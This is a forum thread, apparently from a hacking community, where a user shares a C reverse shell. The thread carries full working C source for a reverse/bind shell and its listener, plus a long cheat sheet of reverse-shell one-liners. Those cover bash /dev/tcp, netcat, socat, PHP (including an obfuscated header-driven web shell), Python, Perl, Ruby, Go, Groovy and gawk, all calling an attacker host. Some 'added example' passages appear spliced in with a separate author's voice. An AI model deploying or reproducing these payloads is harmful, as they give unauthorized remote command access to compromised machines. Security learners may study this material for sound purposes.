Open Source Reverse Shell

OK, so I’ve coded a very basic reverse shell, and I’ve now decided to allow any member to access and view the code. Before I post the code I gotta thank @0x00pf for his awesome tutorial and @Joe_Schmoe for STELF, which inspired me to code this shell. I’m trying to add functionality to my shell, but I’m a 1337 Skid haxor. I’m still learning, but thanks to this community and their patience, especially @_py and of course @pry0cc, plus many others who helped me and answered my really really really dull questions. I’ve learned a lot coding this shell, especially how file descriptors and sockets work. Thank you to all who have helped me out quite a bit!

Now, the code is written in C and I’ve added comments for anyone who is interested in how it all works. To compile, simply do
gcc reverse_shell.c -o reverse_shell

and for the handler same thing,
gcc handler.c -o handler

The file named shell.c is actually a bind shell which I accidentally coded, and it just shows how stupid I can be, but I’ve decided to keep it in case I or anyone else finds it useful. I hope this becomes useful for anyone who is interested. If anyone wants to help with the development of the shell, please request access. Thank you!

Cheers!

9 Likes
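Since the shell itself is only in the repository and not in the post, here is an added example (my own code for this thread, not the author’s reverse_shell.c or shell.c) of the shape such a program takes in C: parse an ip:port, get a connected socket either by calling out (reverse mode) or by listening and accepting (bind mode, the thing the author says shell.c accidentally does), dup2() that socket over fds 0, 1 and 2, then exec /bin/sh. The addresses 10.0.0.1:4444 in the comments are placeholders I made up.

```c
/* rshell.c: minimal reverse shell (default) or bind shell (-b).
 * Build:   gcc rshell.c -o rshell
 * Reverse: ./rshell 10.0.0.1:4444      (listener side: nc -lnvp 4444)
 * Bind:    ./rshell -b 0.0.0.0:4444    (client side:   nc <target> 4444)
 * Addresses/ports are placeholders; this is example code, not the thread's shell. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Parse "a.b.c.d:port" into *out (out may be NULL to only validate).
 * Returns the port on success, -1 on malformed input. Dotted IPv4 only. */
int parse_target(const char *spec, struct sockaddr_in *out)
{
    char host[INET_ADDRSTRLEN];
    const char *colon = strrchr(spec, ':');
    if (colon == NULL) return -1;
    size_t hlen = (size_t)(colon - spec);
    if (hlen == 0 || hlen >= sizeof host) return -1;
    memcpy(host, spec, hlen);
    host[hlen] = '\0';

    char *end;
    long port = strtol(colon + 1, &end, 10);
    if (colon[1] == '\0' || *end != '\0' || port < 1 || port > 65535) return -1;

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons((uint16_t)port);
    if (inet_pton(AF_INET, host, &sa.sin_addr) != 1) return -1;  /* rejects hostnames */
    if (out) *out = sa;
    return (int)port;
}

/* Point fds 0, 1 and 2 at the socket so the shell's stdin/stdout/stderr
 * are the network connection. Returns 0, or -1 if sock is not an open fd. */
int attach_stdio(int sock)
{
    for (int fd = 0; fd <= 2; fd++)
        if (dup2(sock, fd) == -1) return -1;
    return 0;
}

/* Reverse mode: the target connects out to the listener ("calls home"). */
static int connect_back(const struct sockaddr_in *sa)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1) return -1;
    if (connect(s, (const struct sockaddr *)sa, sizeof *sa) == -1) { close(s); return -1; }
    return s;
}

/* Bind mode: listen on the target and wait for one inbound client.
 * This is the variant an inbound firewall rule normally stops. */
static int accept_one(const struct sockaddr_in *sa)
{
    int l = socket(AF_INET, SOCK_STREAM, 0), one = 1;
    if (l == -1) return -1;
    setsockopt(l, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    if (bind(l, (const struct sockaddr *)sa, sizeof *sa) == -1 || listen(l, 1) == -1) { close(l); return -1; }
    int c = accept(l, NULL, NULL);
    close(l);
    return c;
}

int main(int argc, char **argv)
{
    int bind_mode = (argc == 3 && strcmp(argv[1], "-b") == 0);
    const char *spec = bind_mode ? argv[2] : (argc == 2 ? argv[1] : NULL);
    struct sockaddr_in sa;
    if (spec == NULL || parse_target(spec, &sa) == -1) {
        fprintf(stderr, "usage: %s [-b] ip:port\n", argv[0]);
        return 1;
    }
    int s = bind_mode ? accept_one(&sa) : connect_back(&sa);
    if (s == -1 || attach_stdio(s) == -1) { perror("socket"); return 1; }
    if (s > 2) close(s);                /* the three dups keep the connection open */
    execl("/bin/sh", "sh", "-i", (char *)NULL);
    perror("execl");                    /* only reached if the exec failed */
    return 1;
}
```

The only difference between the two modes is which side calls connect(); everything after the socket exists (dup2 over 0/1/2, then exec) is identical, which is why a bind shell is so easy to write by accident. Note that parse_target refuses hostnames on purpose: a resolver lookup from the target is one more thing to go wrong, so the cheat-sheet style of hardcoding the IP is kept here.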

Are we all reverse shelling in this place?

A reverse shell is more reliable than a bind shell because of firewalls. Most firewalls will actually not allow you to bind to the port that a bind shell needs, which is why reverse shells are ideal: they “call home”.

1 Like
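The “call home” side needs something to land on. As an added example (not the thread’s handler.c, whose source isn’t on this page), here is a minimal handler in C: listen on a port, accept the one connection that comes back, and pump bytes between the operator’s terminal and the socket with poll() until either end closes. The port 4444 in the comments is a placeholder.

```c
/* handler.c: listener side of a reverse shell.
 * Build: gcc handler.c -o handler      Run: ./handler 4444
 * Example code added for this thread; the port is a placeholder. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <poll.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* TCP socket listening on 0.0.0.0:port (port 0 = any free port).
 * Returns the listening fd or -1. */
int listen_on(uint16_t port)
{
    int l = socket(AF_INET, SOCK_STREAM, 0), one = 1;
    if (l == -1) return -1;
    setsockopt(l, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);  /* restart quickly after a dropped session */
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    sa.sin_port = htons(port);
    if (bind(l, (struct sockaddr *)&sa, sizeof sa) == -1 || listen(l, 1) == -1) { close(l); return -1; }
    return l;
}

/* Port a listening socket actually holds (useful with port 0), or -1. */
int bound_port(int l)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    if (getsockname(l, (struct sockaddr *)&sa, &len) == -1) return -1;
    return ntohs(sa.sin_port);
}

/* Write all n bytes of buf to fd; 0 on success, -1 on error/closed peer. */
static int write_all(int fd, const char *buf, size_t n)
{
    while (n > 0) {
        ssize_t w = write(fd, buf, n);
        if (w <= 0) return -1;
        buf += w;
        n -= (size_t)w;
    }
    return 0;
}

/* Pump bytes in both directions, in -> sock and sock -> out, until either side
 * reaches EOF. Returns the total bytes relayed, or -1 on a poll() error. */
long relay(int in, int out, int sock)
{
    struct pollfd pfd[2] = { { in, POLLIN, 0 }, { sock, POLLIN, 0 } };
    char buf[4096];
    long total = 0;
    for (;;) {
        if (poll(pfd, 2, -1) == -1) return -1;
        for (int i = 0; i < 2; i++) {
            if (!(pfd[i].revents & (POLLIN | POLLHUP | POLLERR))) continue;
            ssize_t n = read(pfd[i].fd, buf, sizeof buf);
            if (n <= 0) return total;                          /* EOF: session is over */
            if (write_all(i == 0 ? sock : out, buf, (size_t)n) == -1) return total;
            total += n;
        }
    }
}

int main(int argc, char **argv)
{
    long port = argc == 2 ? strtol(argv[1], NULL, 10) : 0;
    if (port < 1 || port > 65535) { fprintf(stderr, "usage: %s port\n", argv[0]); return 1; }
    int l = listen_on((uint16_t)port);
    if (l == -1) { perror("listen"); return 1; }
    struct sockaddr_in peer;
    socklen_t plen = sizeof peer;
    int c = accept(l, (struct sockaddr *)&peer, &plen);
    if (c == -1) { perror("accept"); return 1; }
    close(l);                                                  /* one session per run */
    char ip[INET_ADDRSTRLEN];
    inet_ntop(AF_INET, &peer.sin_addr, ip, sizeof ip);
    fprintf(stderr, "[+] connection from %s:%d\n", ip, ntohs(peer.sin_port));
    long n = relay(STDIN_FILENO, STDOUT_FILENO, c);
    fprintf(stderr, "[-] session closed, %ld bytes relayed\n", n);
    close(c);
    return 0;
}
```

This is functionally what `nc -lnvp 4444` gives you; the point of writing it out is to see that the handler is just a listening socket plus a two-way copy loop, and that the firewall argument above is about which side does the bind(): here it is the attacker’s box, where you control the rules.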

Oh man! If you like those concepts, the reverse DNS and ICMP shells will get you wet…

3 Likes

Awesome Stuff!! Thanks for sharing :slight_smile:

1 Like

Here is what I found:

Bash Reverse Shells

# for a session whose stdin (fd 0) is already the socket: send stderr there too
exec /bin/bash 0<&0 2>&0

# open fd 196 read/write on the socket and hand all three streams to sh
exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done

# or:

while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

socat Reverse Shell

Source: @filip_dragovic

socat tcp:ATTACKING-IP:PORT exec:'bash -i',pty,stderr,setsid,sigint,sane &

Golang Reverse Shell

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","ATTACKING-IP:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

PHP Reverse Shell

A useful PHP reverse shell:

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)

Another PHP reverse shell (that was submitted via Twitter):

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKING-IP/443 0>&1'");?>

Base64 encoded by @0xInfection:

<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

Netcat Reverse Shell

Useful netcat reverse shell examples:

Don’t forget to start your listener, or you won’t be catching any shells :slight_smile:

nc -lnvp 80
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80   # output only: sh still reads commands from the local stdin; use the named-pipe form below for a full shell
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p

A reverse shell submitted by @0xatul which works well for OpenBSD netcat rather than GNU nc:

mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Node.js Reverse Shell

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

Source: @jobertabma via @JaneScott

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

// Groovy syntax (e.g. a Jenkins script console), not plain Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

Gawk one liner rev shell by @dmfroberson:

gawk 'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}'

#!/usr/bin/gawk -f
# Bind-shell variant of the one-liner above: listens on Port and serves whoever connects

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

I hope you found this interesting!

3 Likes